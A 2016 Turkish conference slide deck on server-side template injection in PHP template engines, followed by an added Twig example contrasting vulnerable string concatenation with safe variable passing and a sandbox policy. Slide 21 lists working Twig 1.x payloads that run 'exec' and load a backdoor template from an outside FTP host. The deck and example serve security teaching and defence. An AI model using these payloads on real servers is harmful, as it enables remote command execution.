
Security of Web Framework Templates (SSTI) - Özgür Web Günleri 2016





  1. Web Çatı Şablonlarının Güvenliği (SSTI). Ömer Çıtak. Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr. www.omercitak.com
  2. whoami: Security Researcher @ Netsparker Ltd.; Developer @ (in my spare time); Writer @ "Ethical Hacking: Offensive & Defensive" book. Blog: omercitak.com. All social platforms: @Om3rCitak
  3-7. questions: 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
  8-14. why use a framework? ● Spaghetti code (functions.php) :P ● Enforcing a coding standard ● Pretty URLs ● More code in less time ● MVC or other models
  15-17. what is MVC?
  18-19. what is the VIEW layer? Template engines: ● Twig ● Smarty ● Blade ● Volt ● Mustache ● etc.
  20. twig ● registerUndefinedFilterCallback("function_name") ● getFilter("filter") ● setCache("ftp://omercitak.com:21") ● loadTemplate("backdoor")
  21. exploit ● {{_self.env.registerUndefinedFilterCallback("exec")}} ● {{_self.env.getFilter("ls")}} ● {{_self.env.setCache("ftp://omercitak.com:21")}} ● {{_self.env.loadTemplate("backdoor")}}
  22. demo
  23. questions
  24. thanks. www.omercitak.com. All social platforms: @Om3rCitak
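Slides 20 and 21 show what an attacker can reach once template syntax is evaluated, but not the coding mistake that makes it reachable: request data concatenated into the template source instead of being passed as a template variable. The PHP below is an added example written for this page, not code from the talk or from the Twig project. It assumes Twig 2.7+ or 3.x installed through Composer; the template names, the sandbox policy and the `$userInput` value are constructed for illustration.

```php
<?php
// Added example (not from the talk): the same user-controlled value handled
// the wrong way and the right way with Twig. Assumes Twig 2.7+ or 3.x
// installed via Composer; template names and $userInput are constructed.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Constructed input: in a real application this would come from $_GET/$_POST.
$userInput = '{{ 7 * 7 }}';

// 1) VULNERABLE: the request value becomes part of the template SOURCE, so
//    Twig parses and evaluates whatever syntax it contains. This is the root
//    cause behind every payload on slide 21.
$twig = new Environment(new ArrayLoader());
echo $twig->createTemplate('Hello ' . $userInput . '!')->render(), PHP_EOL;
// prints: Hello 49!   (the expression was evaluated)

// 2) FIXED: the template source is fixed at development time and the request
//    value is passed as a VARIABLE. Twig treats it as data, and with
//    autoescape on it is also HTML-escaped on output.
$loader = new ArrayLoader(['greeting.html.twig' => 'Hello {{ name }}!']);
$twig = new Environment($loader, ['autoescape' => 'html']);
echo $twig->render('greeting.html.twig', ['name' => $userInput]), PHP_EOL;
// prints: Hello {{ 7 * 7 }}!   (the braces are literal text)

// 3) DEFENCE IN DEPTH: when template sources genuinely must come from users
//    (tenant-edited e-mail templates, CMS themes), compile them under a
//    sandbox policy that whitelists tags, filters and functions and allows
//    no method or property access, so Environment methods are unreachable.
$policy = new SecurityPolicy(
    ['if', 'for'],                 // allowed tags
    ['escape', 'upper', 'lower'],  // allowed filters
    [],                            // allowed methods: none
    [],                            // allowed properties: none
    ['range']                      // allowed functions
);
$sandboxed = new Environment(new ArrayLoader(), ['autoescape' => 'html']);
$sandboxed->addExtension(new SandboxExtension($policy, true)); // sandbox every template

try {
    echo $sandboxed->createTemplate('Hello {{ name|upper }}!')
                   ->render(['name' => 'guest']), PHP_EOL;
    // prints: Hello GUEST!   (everything used is in the policy)

    echo $sandboxed->createTemplate('{{ name|join(",") }}')
                   ->render(['name' => ['a', 'b']]), PHP_EOL;
    // never printed: "join" is outside the policy
} catch (SecurityError $e) {
    // The sandbox rejects the template instead of executing it.
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Two practical notes. The `_self.env` chain on slide 21 depends on Twig 1.x, where `_self` is the template object; from Twig 2.0 onward `_self` evaluates to the template name, so that particular chain no longer works, but the root cause (pattern 1 above) is version-independent and other gadgets may exist, which is why the fix is pattern 2, not a version bump. The sandbox in pattern 3 is a second layer, not a replacement: its policy needs the `escape` filter whitelisted when autoescaping is on, and every method or property you later add to the policy becomes reachable from user-authored templates.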
